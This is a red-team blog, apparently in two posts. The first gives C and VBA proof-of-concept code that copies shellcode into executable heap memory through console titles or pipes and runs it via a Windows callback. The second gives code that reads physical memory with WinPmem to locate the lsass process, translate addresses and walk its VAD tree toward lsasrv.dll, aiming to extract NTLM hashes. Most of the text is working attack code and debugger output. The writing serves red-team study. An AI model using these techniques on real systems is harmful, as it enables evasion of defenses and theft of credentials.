LPSTR copied_shellcode = NULL;
HANDLE heap = NULL;
BOOL ret = 0;
int size = 0;
heap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
copied_shellcode = HeapAlloc(heap, 0, 0x10);
PathCanonicalizeA(copied_shellcode, orig_shellcode);
EnumSystemCodePagesW(copied_shellcode, 0);
return 0;
}
Aaand fire in the hole!
With this label we are referring to functions that first need to save the shellcode in a intermediate place, like an environment variable/window title/etc, and then retrieve it from that place. The easiest to spot are the Set/Get twins.
A simple example that comes to our mind is saving the shellcode as a Console Tittle with SetConsoleTitleA
and then calling GetConsoleTitleA
to save it in our RWX region:
#include <Windows.h>
int main(int argc, char** argv) {
LPCSTR orig_shellcode = "\xcc\xcc\xcc\xcc";
LPSTR copied_shellcode = NULL;
HANDLE heap = NULL;
BOOL ret = 0;
heap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
copied_shellcode = HeapAlloc(heap, 0, 0x10);
SetConsoleTitleA(orig_shellcode);
GetConsoleTitleA(copied_shellcode, MAX_PATH);
EnumSystemCodePagesW(copied_shellcode, 0);
return 0;
}
Test it:
Also IPC mechanisms can fall into our “two-shots” category. For example, we can create an anonymous pipe to use it as no man’s place and call WriteFile
/ReadFile
to copy the shellcode:
#include <Windows.h>
int main(int argc, char** argv) {
LPCSTR orig_shellcode = "\xcc\xcc\xcc\xcc";
LPSTR copied_shellcode = NULL;
HANDLE heap = NULL;
HANDLE source = NULL;
HANDLE sink = NULL;
SECURITY_ATTRIBUTES saAttr;
DWORD size = 0;
heap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
copied_shellcode = HeapAlloc(heap, 0, 0x10);
saAttr.nLength = sizeof(SECURITY_ATTRIBUTES);
saAttr.bInheritHandle = TRUE;
saAttr.lpSecurityDescriptor = NULL;
CreatePipe(&sink, &source, &saAttr, 0);
WriteFile(source, orig_shellcode, 4, &size, NULL);
ReadFile(sink, copied_shellcode, 4, &size, NULL);
EnumSystemCodePagesW(copied_shellcode, 0);
return 0;
}
It can be translated to VBA as:
Private Declare PtrSafe Function HeapCreate Lib "kernel32" (ByVal flOptions As Long, ByVal dwInitialSize As LongPtr, ByVal dwMaximumSize As LongPtr) As LongPtr
Private Declare PtrSafe Function HeapAlloc Lib "kernel32" (ByVal hHeap As LongPtr, ByVal dwFlags As Long, ByVal dwBytes As LongPtr) As LongPtr
Private Declare PtrSafe Function EnumSystemCodePagesW Lib "kernel32" (ByVal lpCodePageEnumProc As LongPtr, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function CreatePipe Lib "kernel32" (phReadPipe As LongPtr, phWritePipe As LongPtr, lpPipeAttributes As SECURITY_ATTRIBUTES, ByVal nSize As Long) As Long
Private Declare PtrSafe Function ReadFile Lib "kernel32" (ByVal hFile As LongPtr, ByVal lpBuffer As LongPtr, ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, lpOverlapped As Long) As Long
Private Declare PtrSafe Function WriteFile Lib "kernel32" (ByVal hFile As LongPtr, ByVal lpBuffer As LongPtr, ByVal nNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, lpOverlapped As Long) As Long
Private Type SECURITY_ATTRIBUTES
nLength As Long
lpSecurityDescriptor As LongPtr
bInheritHandle As Long
End Type
Sub poc()
Dim orig_shellcode(0 To 3) As Byte
Dim copied_shellcode As LongPtr
Dim heap As LongPtr
Dim size As Long
Dim ret As Long
Dim source As LongPtr
Dim sink As LongPtr
Dim saAttr As SECURITY_ATTRIBUTES
Dim HEAP_CREATE_ENABLE_EXECUTE As Long
HEAP_CREATE_ENABLE_EXECUTE = &H40000
orig_shellcode(0) = &HCC
orig_shellcode(1) = &HCC
orig_shellcode(2) = &HCC
orig_shellcode(3) = &HCC
heap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0)
copied_shellcode = HeapAlloc(heap, 0, &H10)
saAttr.nLength = LenB(SECURITY_ATRIBUTES)
saAttr.bInheritHandle = 1
saAttr.lpSecurityDescriptor = 0
ret = CreatePipe(sink, source, saAttr, 0)
ret = WriteFile(source, VarPtr(orig_shellcode(0)), 4, size, 0)
ret = ReadFile(sink, copied_shellcode, 4, size, 0)
ret = EnumSystemCodePagesW(copied_shellcode, 0)
End Sub
Although the topic discussed in this article is old, we tend to see always the same patterns (probably just because people repeats what it is highly shared in internet). We encourage to explore alternatives ways to do the things and not just follow blindly what others do.
As Red Teamers we have to repeat TTPs seen in the wild but also we need to explore more paths. There are dozens of ways to copy and trigger your shellcode, just don’t stick to one and be creative!
We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.
Dear Fellowlship, today’s homily is about how one of our owls began his own quest through the lands of physical memory to find the credentials keys to paradise. Please, take a seat and listen to the story.
Our knowledge about the topic discussed in this article is limited, as we stated in the tittle we did this work just for learning purposes. If you spot incorrections/misconceptions, please ping us at twitter so we can fix it. For a more accurate information (and deep explanations), please check the book “Windows Internals” (Pavel Yosifovich, Alex Ionescu, Mark E. Russinovich & David A. Solomon). Also well-known forensic tools are a good source of information (for example Volatility).
Other important thing to keep in mind: the windows version used here is Windows 10 2009 20H2 (October 2020 Update).
Hunting for juicy information inside dumps of physical memory is something that regular forensic tools do by default. Even cheaters have been exploring this way in the past to build wallhacks: read physical memory, find your desired game process and look for the player information structs.
From a Red Teaming/Pentesting optics, this approach has been explored too in order to obtain credentials from the lsass process in live machines during engagements. For example, in 2020 F-Secure published an article titled “Rethinking credential theft” and released a tool called “PhysMem2Profit”.
In their article/tool they use WinPmem driver to read physical memory (a vulnerable driver with a read primitive would work too), creating a bridge with sockets between the target machine and the pentester machine, so they can create a minidump of lsass process that is compatible with Mimikatz with the help of Rekall.
The steps they follow are:
In our humble opinion, this approach is too convoluted and contains unnecessary steps. Also creating a socket between the two machines does not look fine to us. So… here comes our idea: let’s try to loot lsass from physical memory staying in the same machine and WITHOUT externals tools (like they did with rekall). It is a good opportunity to learn new things!kd
As in any quest, we first need a map and a compass to find the treasure because the land of physical memory is dangerous and full of terrors. We can read arbitrary physical memory with WinPem or a driver vulnerable with a read primitive, but… How can we find the process memory? Well, our map is the AVL-tree that contains the VADs info and our compass is the EPROCESS struct. Let’s explain this!
The Memory Manager needs to keep track of which virtual addresses have been reserved in the process’ address space. This information is contained in structs called “VAD” (Virtual Address Descriptor) and they are placed inside an AVL-tree (an AVL-tree is a self-balancing binary search tree). The tree is our map: if we find the tree’s first node we can start to walk it and retrieve all the VADs, and consequently we would get the knowledge of how the process memory is distributed (also, the VAD provides more useful information as we are going to see later).
But… how can we find this tree? Well, we need the compass. And our compass is the EPROCESS. This structure contains a pointer to the tree (field VadRoot) and the number of nodes (VadCount):
//0xa40 bytes (sizeof)
struct _EPROCESS
{
struct _KPROCESS Pcb; //0x0
struct _EX_PUSH_LOCK ProcessLock; //0x438
VOID* UniqueProcessId; //0x440
struct _LIST_ENTRY ActiveProcessLinks; //0x448
struct _EX_RUNDOWN_REF RundownProtect; //0x458
//(...)
struct _RTL_AVL_TREE VadRoot; //0x7d8
VOID* VadHint; //0x7e0
ULONGLONG VadCount; //0x7e8
//(...)
Finding this structure in physical memory is easy. In the article “CVE-2019-8372: Local Privilege Elevation in LG Kernel Driver”, @Jackson_T uses a mask to find this structure. As we know some data (like the PID, the process name or the Priority value) we can use this as a signature and search the whole physical memory until we match it.
We’ll know the name and PID for each process we’re targeting, so the UniqueProcessId and ImageFileName fields should be good candidates. Problem is that we won’t be able to accurately predict the values for every field between them. Instead, we can define two needles: one that has ImageFileName and another that has UniqueProcessId. We can see that their corresponding byte buffers have predictable outputs. (From Jackson_T post)
So, we can search for our masks and then apply relative offsets to read the fields that we are interested in:
int main(int argc, char** argv) {
WINPMEM_MEMORY_INFO info;
DWORD size;
BOOL result = FALSE;
int i = 0;
LARGE_INTEGER large_start;
DWORD found = 0;
printf("[+] Getting WinPmem handle...\t");
pmem_fd = CreateFileA("\\\\.\\pmem",
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (pmem_fd == INVALID_HANDLE_VALUE) {
printf("ERROR!\n");
return -1;
}
printf("OK!\n");
RtlZeroMemory(&info, sizeof(WINPMEM_MEMORY_INFO));
printf("[+] Getting memory info...\t");
result = DeviceIoControl(pmem_fd, IOCTL_GET_INFO,
NULL, 0, // in
(char*)&info, sizeof(WINPMEM_MEMORY_INFO), // out
&size, NULL);
if (!result) {
printf("ERROR!\n");
return -1;
}
printf("OK!\n");
printf("[+] Memory Info:\n");
printf("\t[-] Total ranges: %lld\n", info.NumberOfRuns.QuadPart);
for (i = 0; i < info.NumberOfRuns.QuadPart; i++) {
printf("\t\tStart 0x%08llX - Length 0x%08llx\n", info.Run[i].BaseAddress.QuadPart, info.Run[i].NumberOfBytes.QuadPart);
max_physical_memory = info.Run[i].BaseAddress.QuadPart + info.Run[i].NumberOfBytes.QuadPart;
}
printf("\t[-] Max physical memory 0x%08llx\n", max_physical_memory);
printf("[+] Scanning memory... ");
for (i = 0; i < info.NumberOfRuns.QuadPart; i++) {
start = info.Run[i].BaseAddress.QuadPart;
end = info.Run[i].BaseAddress.QuadPart + info.Run[i].NumberOfBytes.QuadPart;
while (start < end) {
unsigned char* largebuffer = (unsigned char*)malloc(BUFF_SIZE);
DWORD to_write = (DWORD)min((BUFF_SIZE), end - start);
DWORD bytes_read = 0;
DWORD bytes_written = 0;
large_start.QuadPart = start;
result = SetFilePointerEx(pmem_fd, large_start, NULL, FILE_BEGIN);
if (!result) {
printf("[!] ERROR! (SetFilePointerEx)\n");
}
result = ReadFile(pmem_fd, largebuffer, to_write, &bytes_read, NULL);
EPROCESS_NEEDLE needle_root_process = {"lsass.exe"};
PBYTE needle_buffer = (PBYTE)malloc(sizeof(EPROCESS_NEEDLE));
memcpy(needle_buffer, &needle_root_process, sizeof(EPROCESS_NEEDLE));
int offset = 0;
offset = memmem((PBYTE)largebuffer, bytes_read, needle_buffer, sizeof(EPROCESS_NEEDLE)); // memmem() is the same used by Jackson_T in his post
if (offset >= 0) {
if (largebuffer[offset + 15] == 2) { //Priority Check
if (largebuffer[offset - 0x168] == 0x70 && largebuffer[offset - 0x167] == 0x02) { //PID check, hardcoded for PoC, we can take in runtime but... too lazy :P
printf("signature match at 0x%08llx!\n", offset + start);
printf("[+] EPROCESS is at 0x%08llx [PHYSICAL]\n", offset - 0x5a8 + start);
memcpy(&DirectoryTableBase, largebuffer + offset - 0x5a8 + 0x28, sizeof(ULONGLONG));
printf("\t[*] DirectoryTableBase: 0x%08llx\n", DirectoryTableBase);
printf("\t[*] VadRoot is at 0x%08llx [PHYSICAL]\n", start + offset - 0x5a8 + 0x7d8);
memcpy(&VadRootPointer, largebuffer + offset - 0x5a8 + 0x7d8, sizeof(ULONGLONG));
VadRootPointer = VadRootPointer;
printf("\t[*] VadRoot points to 0x%08llx [VIRTUAL]\n", VadRootPointer);
memcpy(&VadCount, largebuffer + offset - 0x5a8 + 0x7e8, sizeof(ULONGLONG));
printf("\t[*] VadCount is %lld\n", VadCount);
free(needle_buffer);
free(largebuffer);
found = 1;
break;
}
}
}
start += bytes_read;
free(needle_buffer);
free(largebuffer);
}
if (found != 0) {
break;
}
}
return 0;
}
And here is the ouput:
[+] Getting WinPmem handle... OK!
[+] Getting memory info... OK!
[+] Memory Info:
[-] Total ranges: 4
Start 0x00001000 - Length 0x0009e000
Start 0x00100000 - Length 0x00002000
Start 0x00103000 - Length 0xdfeed000
Start 0x100000000 - Length 0x20000000
[-] Max physical memory 0x120000000
[+] Scanning memory... signature match at 0x271c3628!
[+] EPROCESS is at 0x271c3080 [PHYSICAL]
[*] DirectoryTableBase: 0x29556000
[*] VadRoot is at 0x271c3858 [PHYSICAL]
[*] VadRoot points to 0xffffa48bb0147290 [VIRTUAL]
[*] VadCount is 165
Maybe you are wondering why are we interested in the field DirectoryTableBase. The thing is: from our point of view we only can work with physical memory, we do not “understand” what a virtual address is because to us they are “out of context”. We know about physical memory and offsets, not about virtual addresses bounded to a process. But we are going to deal with pointers to virtual memory so… we need a way to translate them.
I like to compare virtual addresses with the code used in libraries to know the location of a book, where the first digits indicates the hall, the next the bookshelf, the column and finally the shelf where the book lies.
Our virtual address is in some way just like the library code: it contains different indexes. Instead of talking about halls, columns or shelves, we have Page-Map-Level4 (PML4E), Page-Directory-Pointer (PDPE), Page-Directory (PDE), Page-Table (PTE) and the Page Physical Offset.
Those are the page levels for a 4KB page, for 2MB we have PML4E, PDPE, PDE and the offset. We can verify this information using kd and the command !vtop with different processes:
For 4KB (Base 0x26631000, virtual adress to translate 0xffffc987034fd330):
lkd> !vtop 26631000 0xffffc987034fd330
Amd64VtoP: Virt ffffc987034fd330, pagedir 0000000026631000
Amd64VtoP: PML4E 0000000026631c98
Amd64VtoP: PDPE 00000000046320e0
Amd64VtoP: PDE 0000000100a1c0d0
Amd64VtoP: PTE 000000001fa3f7e8
Amd64VtoP: Mapped phys 0000000026da8330
Virtual address ffffc987034fd330 translates to physical address 26da8330.
For 2MB (Base 0x1998D000, virtual address to translate 0xffffaa83f4b35640):
lkd> !vtop 1998D000 ffffaa83f4b35640
Amd64VtoP: Virt ffffaa83f4b35640, pagedir 000000001998d000
Amd64VtoP: PML4E 000000001998daa8
Amd64VtoP: PDPE 0000000004631078
Amd64VtoP: PDE 0000000004734d28
Amd64VtoP: Large page mapped phys 0000000108d35640
Virtual address ffffaa83f4b35640 translates to physical address 108d35640.
What is it doing under the hood? Well, the picture of a 4KB page follows this explanation: if you turn the virtual address to its binary representation, you can split it into the indexes of each page level. So, imagine we want to translate the virtual address 0xffffa48bb0147290
and the process page base is 0x29556000
(let’s assume is a 4KB page, later we will explain how to know it).
lkd> .formats ffffa48bb0147290
Evaluate expression:
Hex: ffffa48b`b0147290
Decimal: -100555115171184
Octal: 1777775110566005071220
Binary: 11111111 11111111 10100100 10001011 10110000 00010100 01110010 10010000
Chars: ......r.
Time: ***** Invalid FILETIME
Float: low -5.40049e-010 high -1.#QNAN
Double: -1.#QNAN
Now we can split the bits in chunks: 12 bits for the Page Physical Offset, 9 for the PTE, 9 for the PDE, 9 for the PDPE and 9 for the PML4E:
1111111111111111 101001001 000101110 110000000 101000111 001010010000
Next we are going to take the chunk for PML4E and multiply by 0x8:
lkd> .formats 0y101001001
Evaluate expression:
Hex: 00000000`00000149
Decimal: 329
Octal: 0000000000000000000511
Binary: 00000000 00000000 00000000 00000000 00000000 00000000 00000001 01001001
Chars: .......I
Time: Thu Jan 1 01:05:29 1970
Float: low 4.61027e-043 high 0
Double: 1.62548e-321
0x149 * 0x8 = 0xa48
Now we can use it as an offset: just add this value to the page base (0x29556a48
). Next, read the physical memory at that location:
lkd> !dq 29556a48
#29556a48 0a000000`04632863 00000000`00000000
#29556a58 00000000`00000000 00000000`00000000
#29556a68 00000000`00000000 00000000`00000000
#29556a78 00000000`00000000 00000000`00000000
#29556a88 00000000`00000000 00000000`00000000
#29556a98 00000000`00000000 00000000`00000000
#29556aa8 00000000`00000000 00000000`00000000
#29556ab8 00000000`00000000 00000000`00000000
Turn to zero the last 3 numbers, so we have 0x4632000
. Now repeat the operation of multiplying the chunk of bits:
kd> .formats 0y000101110
Evaluate expression:
Hex: 00000000`0000002e
Decimal: 46
Octal: 0000000000000000000056
Binary: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00101110
Chars: ........
Time: Thu Jan 1 01:00:46 1970
Float: low 6.44597e-044 high 0
Double: 2.2727e-322
So… 0x4632000 + (0x2e * 0x8) == 0x4632170
. Read the physical memory at this point:
lkd> !dq 4632170
# 4632170 0a000000`04735863 00000000`00000000
# 4632180 00000000`00000000 00000000`00000000
# 4632190 00000000`00000000 00000000`00000000
# 46321a0 00000000`00000000 00000000`00000000
# 46321b0 00000000`00000000 00000000`00000000
# 46321c0 00000000`00000000 00000000`00000000
# 46321d0 00000000`00000000 00000000`00000000
# 46321e0 00000000`00000000 00000000`00000000
Just repeat the same operation until the end (except for the last 12 bits, those don’t need to be multiplied by 0x8) and you have successfully translated your virtual address! Don’t trust me? Check it!
kd> !vtop 0x29556000 0xffffa48bb0147290
Amd64VtoP: Virt ffffa48bb0147290, pagedir 0000000029556000
Amd64VtoP: PML4E 0000000029556a48
Amd64VtoP: PDPE 0000000004632170
Amd64VtoP: PDE 0000000004735c00
Amd64VtoP: PTE 0000000022246a38
Amd64VtoP: Mapped phys 000000001645b290
Virtual address ffffa48bb0147290 translates to physical address 1645b290.
Ta-dá!
Here is a sample function that we are going to use to translate virtual addresses (4KB and 2MB) to physical (ugly as hell, but works):
ULONGLONG v2p(ULONGLONG vaddr) {
BOOL result = FALSE;
DWORD bytes_read = 0;
LARGE_INTEGER PML4E;
LARGE_INTEGER PDPE;
LARGE_INTEGER PDE;
LARGE_INTEGER PTE;
ULONGLONG SIZE = 0;
ULONGLONG phyaddr = 0;
ULONGLONG base = 0;
base = DirectoryTableBase;
PML4E.QuadPart = base + extractBits(vaddr, 9, 39) * 0x8;
//printf("[DEBUG Virtual Address: 0x%08llx]\n", vaddr);
//printf("\t[*] PML4E: 0x%x\n", PML4E.QuadPart);
result = SetFilePointerEx(pmem_fd, PML4E, NULL, FILE_BEGIN);
PDPE.QuadPart = 0;
result = ReadFile(pmem_fd, &PDPE.QuadPart, 7, &bytes_read, NULL);
PDPE.QuadPart = extractBits(PDPE.QuadPart, 56, 12) * 0x1000 + extractBits(vaddr, 9, 30) * 0x8;
//printf("\t[*] PDPE: 0x%08llx\n", PDPE.QuadPart);
result = SetFilePointerEx(pmem_fd, PDPE, NULL, FILE_BEGIN);
PDE.QuadPart = 0;
result = ReadFile(pmem_fd, &PDE.QuadPart, 7, &bytes_read, NULL);
PDE.QuadPart = extractBits(PDE.QuadPart, 56, 12) * 0x1000 + extractBits(vaddr, 9, 21) * 0x8;
//printf("\t[*] PDE: 0x%08llx\n", PDE.QuadPart);
result = SetFilePointerEx(pmem_fd, PDE, NULL, FILE_BEGIN);
PTE.QuadPart = 0;
result = ReadFile(pmem_fd, &SIZE, 8, &bytes_read, NULL);
if (extractBits(SIZE, 1, 63) == 1) {
result = SetFilePointerEx(pmem_fd, PDE, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, &phyaddr, 7, &bytes_read, NULL);
phyaddr = extractBits(phyaddr, 56, 20) * 0x100000 + extractBits(vaddr, 21, 0);
//printf("\t[*] Physical Address: 0x%08llx\n", phyaddr);
return phyaddr;
}
result = SetFilePointerEx(pmem_fd, PDE, NULL, FILE_BEGIN);
PTE.QuadPart = 0;
result = ReadFile(pmem_fd, &PTE.QuadPart, 7, &bytes_read, NULL);
PTE.QuadPart = extractBits(PTE.QuadPart, 56, 12) * 0x1000 + extractBits(vaddr, 9, 12) * 0x8;
//printf("\t[*] PTE: 0x%08llx\n", PTE.QuadPart);
result = SetFilePointerEx(pmem_fd, PTE, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, &phyaddr, 7, &bytes_read, NULL);
phyaddr = extractBits(phyaddr, 56, 12) * 0x1000 + extractBits(vaddr, 12, 0);
//printf("\t[*] Physical Address: 0x%08llx\n", phyaddr);
return phyaddr;
}
Well, now we can work with virtual addresses. Let’s move!
The next task to solve is to walk the AVL tree and extract all the VADs. Let’s check the VadRoot pointer:
lkd> dq ffffa48bb0147290
ffffa48b`b0147290 ffffa48b`b0146c50 ffffa48b`b01493b0
ffffa48b`b01472a0 00000000`00000001 ff643ab1`ff643aa0
ffffa48b`b01472b0 00000000`00000707 00000000`00000000
ffffa48b`b01472c0 00000003`000003a0 00000000`00000000
ffffa48b`b01472d0 00000000`04000000 ffffa48b`b014daa0
ffffa48b`b01472e0 ffffd100`10b56f40 ffffd100`10b56fc8
ffffa48b`b01472f0 ffffa48b`b014da28 ffffa48b`b014da28
ffffa48b`b0147300 ffffa48b`b016e081 00007ff6`43aa5002
The first thing we can see is the pointer to the left node (offset 0x00-0x07) and the pointer to the right node (0x08-0x10). We have to add them to a queue and check them later, and add their respective new children nodes, repeating this operation in order to walk the whole tree. Also combining 4 bytes from 0x18 and 1 byte from 0x20 we get the starting address of the described memory region (the ending virtual address is obtained combining 4 bytes from 0x1c and 1 byte from 0x21). So we can walk the whole tree doing something like:
//(...)
currentNode = queue[cursor]; // Current Node, at start it is the VadRoot pointer
if (currentNode == 0) {
cursor++;
continue;
}
reader.QuadPart = v2p(currentNode); // Get Physical Address
left = readPhysMemPointer(reader); //Read 8 bytes and save it as "left" node
queue[last++] = left; //Add the new node
//printf("[<] Left: 0x%08llx\n", left);
reader.QuadPart = v2p(currentNode + 0x8); // Get Physical Address of right node
right = readPhysMemPointer(reader); //Save the pointer
queue[last++] = right; //Add the new node
//printf("[>] Right: 0x%08llx\n", right);
// Get the start address
reader.QuadPart = v2p(currentNode + 0x18);
result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, &startingVpn, 4, &bytes_read, NULL);
reader.QuadPart = v2p(currentNode + 0x20);
result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, &startingVpnHigh, 1, &bytes_read, NULL);
start = (startingVpn << 12) | (startingVpnHigh << 44);
// Get the end address
reader.QuadPart = v2p(currentNode + 0x1c);
result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, &endingVpn, 4, &bytes_read, NULL);
reader.QuadPart = v2p(currentNode + 0x21);
result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, &endingVpnHigh, 1, &bytes_read, NULL);
end = (((endingVpn + 1) << 12) | (endingVpnHigh << 44));
//(...)
Now we can retrieve all the regions of virtual memory reserved, and the limits (starting address and ending address, and by substraction the size):
[+] Starting to walk _RTL_AVL_TREE...
===================[VAD info]===================
[0] (0xffffa48bb0147290) [0x7ff643aa0000-0x7ff643ab2000] (73728 bytes)
[1] (0xffffa48bb0146c50) [0x1d4d2ef0000-0x1d4d2f0d000] (118784 bytes)
[2] (0xffffa48bb01493b0) [0x7ff845000000-0x7ff845027000] (159744 bytes)
[3] (0xffffa48bb0179300) [0x80cbf00000-0x80cbf80000] (524288 bytes)
[4] (0xffffa48bb01795d0) [0x1d4d36a0000-0x1d4d36a1000] (4096 bytes)
[5] (0xffffa48bb01a1390) [0x7ff844540000-0x7ff84454c000] (49152 bytes)
But VADs contain other interesting metadata. For example, if the region is reserved for an image file, we can retrieve the path of that file. This is important for us because we want to locate the loaded lsasrv.dll inside the lsass process because from here is where we are going to loot credentials (imitating the Mimikatz’s sekurlsa::msv
to get NTLM hashes).
Let’s take a ride through the __mmvad
struct (follow the arrows!):
lkd> dt nt!_mmvad 0xffffe786`ed185cf0
+0x000 Core : _MMVAD_SHORT
+0x040 u2 : <anonymous-tag>
+0x048 Subsection : 0xffffe786`ed185d60 _SUBSECTION <===========
+0x050 FirstPrototypePte : (null)
+0x058 LastContiguousPte : 0x00000002`00000006 _MMPTE
+0x060 ViewLinks : _LIST_ENTRY [ 0x00000006`00000029 - 0x00000000`00000000 ]
+0x070 VadsProcess : 0xffffe786`ed185c70 _EPROCESS
+0x078 u4 : <anonymous-tag>
+0x080 FileObject : 0xffffe786`ed185d98 _FILE_OBJECT
kd> dt nt!_SUBSECTION 0xffffe786`ed185d60
+0x000 ControlArea : 0xffffe786`ed185c70 _CONTROL_AREA <==============================
+0x008 SubsectionBase : 0xffffae0e`cab53f58 _MMPTE
+0x010 NextSubsection : 0xffffe786`ed185d98 _SUBSECTION
+0x018 GlobalPerSessionHead : _RTL_AVL_TREE
+0x018 CreationWaitList : (null)
+0x018 SessionDriverProtos : (null)
+0x020 u : <anonymous-tag>
+0x024 StartingSector : 0x2b
+0x028 NumberOfFullSectors : 0x2c
+0x02c PtesInSubsection : 6
+0x030 u1 : <anonymous-tag>
+0x034 UnusedPtes : 0y000000000000000000000000000000 (0)
+0x034 ExtentQueryNeeded : 0y0
+0x034 DirtyPages : 0y0
lkd> dt nt!_CONTROL_AREA 0xffffe786`ed185c70
+0x000 Segment : 0xffffae0e`ce0c9f50 _SEGMENT
+0x008 ListHead : _LIST_ENTRY [ 0xffffe786`ed1b1210 - 0xffffe786`ed1b1210 ]
+0x008 AweContext : 0xffffe786`ed1b1210 Void
+0x018 NumberOfSectionReferences : 1
+0x020 NumberOfPfnReferences : 0xf
+0x028 NumberOfMappedViews : 1
+0x030 NumberOfUserReferences : 2
+0x038 u : <anonymous-tag>
+0x03c u1 : <anonymous-tag>
+0x040 FilePointer : _EX_FAST_REF <=================
+0x048 ControlAreaLock : 0n0
+0x04c ModifiedWriteCount : 0
+0x050 WaitList : (null)
+0x058 u2 : <anonymous-tag>
+0x068 FileObjectLock : _EX_PUSH_LOCK
+0x070 LockedPages : 1
+0x078 u3 : <anonymous-tag>
So at 0xffffe786ed185c70
plus 0x40 we have a field called FilePointer and it is an EX_FAST_REF
. In order to retrieve the correct pointer, we have to retrieve the pointer from this position and turn to zero the last digit:
lkd> dt nt!_EX_FAST_REF 0xffffe786`ed185c70+0x40
+0x000 Object : 0xffffe786`ed19539c Void <=========================== & 0xfffffffffffffff0
+0x000 RefCnt : 0y1100
+0x000 Value : 0xffffe786`ed19539c
So 0xffffe786ed19539c & 0xfffffffffffffff0
is 0xffffe786ed195390
, which is a pointer to a _FILE_OBJECT
struct:
lkd> dt nt!_FILE_OBJECT 0xffffe786`ed195390
+0x000 Type : 0n5
+0x002 Size : 0n216
+0x008 DeviceObject : 0xffffe786`e789c060 _DEVICE_OBJECT
+0x010 Vpb : 0xffffe786`e77df4c0 _VPB
+0x018 FsContext : 0xffffae0e`cd2c8170 Void
+0x020 FsContext2 : 0xffffae0e`cd2c83e0 Void
+0x028 SectionObjectPointer : 0xffffe786`ed18e7f8 _SECTION_OBJECT_POINTERS
+0x030 PrivateCacheMap : (null)
+0x038 FinalStatus : 0n0
+0x040 RelatedFileObject : (null)
+0x048 LockOperation : 0 ''
+0x049 DeletePending : 0 ''
+0x04a ReadAccess : 0x1 ''
+0x04b WriteAccess : 0 ''
+0x04c DeleteAccess : 0 ''
+0x04d SharedRead : 0x1 ''
+0x04e SharedWrite : 0 ''
+0x04f SharedDelete : 0x1 ''
+0x050 Flags : 0x44042
+0x058 FileName : _UNICODE_STRING "\Windows\System32\lsass.exe" <======== /!\
+0x068 CurrentByteOffset : _LARGE_INTEGER 0x0
+0x070 Waiters : 0
+0x074 Busy : 0
+0x078 LastLock : (null)
+0x080 Lock : _KEVENT
+0x098 Event : _KEVENT
+0x0b0 CompletionContext : (null)
+0x0b8 IrpListLock : 0
+0x0c0 IrpList : _LIST_ENTRY [ 0xffffe786`ed195450 - 0xffffe786`ed195450 ]
+0x0d0 FileObjectExtension : (null)
Finally! At offset 0x58 is an _UNICODE_STRING
struct that contains the path to the image asociated with this memory region. In order to get this info, we need to parse each node found and get deep in this rollercoaster of structs, reading each pointer from the target offset. So… finally we are going to have something like:
void walkAVL(ULONGLONG VadRoot, ULONGLONG VadCount) {
/* Variables used to walk the AVL tree*/
ULONGLONG* queue;
BOOL result;
DWORD bytes_read = 0;
LARGE_INTEGER reader;
ULONGLONG cursor = 0;
ULONGLONG count = 1;
ULONGLONG last = 1;
ULONGLONG startingVpn = 0;
ULONGLONG endingVpn = 0;
ULONGLONG startingVpnHigh = 0;
ULONGLONG endingVpnHigh = 0;
ULONGLONG start = 0;
ULONGLONG end = 0;
VAD* vadList = NULL;
printf("[+] Starting to walk _RTL_AVL_TREE...\n");
queue = (ULONGLONG *)malloc(sizeof(ULONGLONG) * VadCount * 4); // Make room for our queue
queue[0] = VadRoot; // Node 0
vadList = (VAD*)malloc(VadCount * sizeof(*vadList)); // Save all the VADs in an array. We do not really need it (because we can just break when the lsasrv.dll is found) but hey... maybe we want to reuse this code in the future
while (count <= VadCount) {
ULONGLONG currentNode;
ULONGLONG left = 0;
ULONGLONG right = 0;
ULONGLONG subsection = 0;
ULONGLONG control_area = 0;
ULONGLONG filepointer = 0;
ULONGLONG fileobject = 0;
ULONGLONG filename = 0;
USHORT pathLen = 0;
LPWSTR path = NULL;
// printf("Cursor [%lld]\n", cursor);
currentNode = queue[cursor]; // Current Node, at start it is the VadRoot pointer
if (currentNode == 0) {
cursor++;
continue;
}
reader.QuadPart = v2p(currentNode); // Get Physical Address
left = readPhysMemPointer(reader); //Read 8 bytes and save it as "left" node
queue[last++] = left; //Add the new node
//printf("[<] Left: 0x%08llx\n", left);
reader.QuadPart = v2p(currentNode + 0x8); // Get Physical Address of right node
right = readPhysMemPointer(reader); //Save the pointer
queue[last++] = right; //Add the new node
//printf("[>] Right: 0x%08llx\n", right);
// Get the start address
reader.QuadPart = v2p(currentNode + 0x18);
result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, &startingVpn, 4, &bytes_read, NULL);
reader.QuadPart = v2p(currentNode + 0x20);
result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, &startingVpnHigh, 1, &bytes_read, NULL);
start = (startingVpn << 12) | (startingVpnHigh << 44);
// Get the end address
reader.QuadPart = v2p(currentNode + 0x1c);
result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, &endingVpn, 4, &bytes_read, NULL);
reader.QuadPart = v2p(currentNode + 0x21);
result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, &endingVpnHigh, 1, &bytes_read, NULL);
end = (((endingVpn + 1) << 12) | (endingVpnHigh << 44));
